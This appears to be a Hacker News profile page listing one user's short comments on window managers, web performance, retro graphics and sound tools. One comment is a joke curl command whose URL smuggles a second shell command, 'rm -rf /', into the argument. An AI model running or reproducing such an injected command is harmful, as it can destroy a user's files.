Viewing profile — TheZenPsycho
TheZenPsycho
HN member- Joined
- Tue, Nov 20, 2012, 1:12 PM UTC
- HN karma
- 1,505
- Public activity
- 654 items
- HN profile
- View on Hacker News ↗
About TheZenPsycho
Recent public activity
-
comment
Comment #8720034
OSX fundamentally doesn't support robust tiling window managers. they exist only as a pale shadow of the real thing.
-
comment
Comment #8691815
My current obsession is finding a way to filter an image to display using the sharp MZ-series character set: http://www.sharpmz.org/mz-700/codetable.htm Very interesting symbol tab…
-
comment
Comment #8525653
Yes, wanting some other language in the browser is a very common wish on hacker news. It's just completely and utterly impractical in real life. Even if you found some way to get s…
-
comment
Comment #8524691
>How's that offline web apps thing going? it was going just fine until apple disabled it in iOS7 but despite that setback, google continues to bank its entire business on offline w…
-
comment
Comment #8524687
Yep. just compile it to javascript/asm.js and you get basically native speed, same security sandbox as javascript, and all the same problems with the web; the vast majority of whic…
-
comment
Comment #8524668
the performance and memory bottleneck in the web is not, as it is commonly believed, javascript, or html. It's the increasingly complicated DOM, and CSS3 layout model. Web Apps go …
-
comment
Comment #8524627
It's the worst web platform except for all other platforms.
-
comment
Comment #8386701
curl http://www.perfectly-safe.com/script.sh?whoops&rm""-rf""/""
-
comment
Comment #8329526
This is a philosophical problem. What is the difference really between: 1. a prewritten engine, and 2. some hypothetical language each where you write commander keen with 3k loc. W…
-
comment
Comment #8328757
33k sounds like a lot. I should think a game like this today would be more like 3k, or maybe 10k at most + engine code + content. Nowadays you see, it's wasteful to write an engine…
-
comment
Comment #8295682
What about ditching the caps-lock key and making it a "command" key, that you hold down to type in a command?
-
comment
Comment #8225257
I thought for a moment you'd "stolen" my idea. (stolen in quotes, because I never told anyone, and ideas can be arrived at independantly, why not?) The idea I had was extending ans…
-
comment
Comment #8215023
Hey great work. I wonder how hard it would be to adapt this to creating teletext art as well?
-
comment
Comment #8212379
>> "document.querySelectorAll" must be called on the document object, and reassigning it to a variable like this will make it be called with "this" assigned to the global object, o…
-
comment
Comment #8212148
>> since a flat file could be binary data...
-
comment
Comment #8210367
Well I suppose then maybe I have the wrong idea of what "flat file database" means. To you anyway. I would not actually describe sqlite as a flat file database system... Since the …
-
comment
Comment #8210182
Do you think in theory that it is possible to create a flat file based system that is multi-thread/multiuser safe? My somewhat ignorant inclination is to suggest that maildir fits …
-
comment
Comment #8181086
not to mention things like hblank interrupt based parallax scrolling!
-
comment
Comment #8176710
this is way cool. I wonder if there's an easier way to find those entry points. For videoram for instance, isn't it possible to set a break point on a write to some spot in vram, a…
-
comment
Comment #8171162
would you have done just a straight clone or would you improve the visual output in some way? what sorts of things could you do while retaining pinout compatibility?
-
comment
Comment #8135560
sometimes the barrier to entry is simply not knowing anyone you can ask. I'd almost suggest something like 99 designs but, the problem with that site is it significantly devalues t…
-
comment
Comment #8129488
The original motivation for SFXR is the number of games produced that were simply silent . SFXR changed that to not silent. It sounds cheap to say this, I'll admit. But if you want…
-
comment
Comment #8129477
it started out with sfxr [1] then the clones started the mac clone cfxr [2] the flash clone, you linked to. the fork of that, called bfxr [3] the ios port [4] the (much better, in …
-
comment
Comment #8117777
Interesting. What did freehand have that illustrator does not?
-
comment
Comment #8062765
"this book is aimed at newcomers to the field of logical reasoning" What I find in practice with these (quite popular) lists of logical fallacies, is that they are usually written …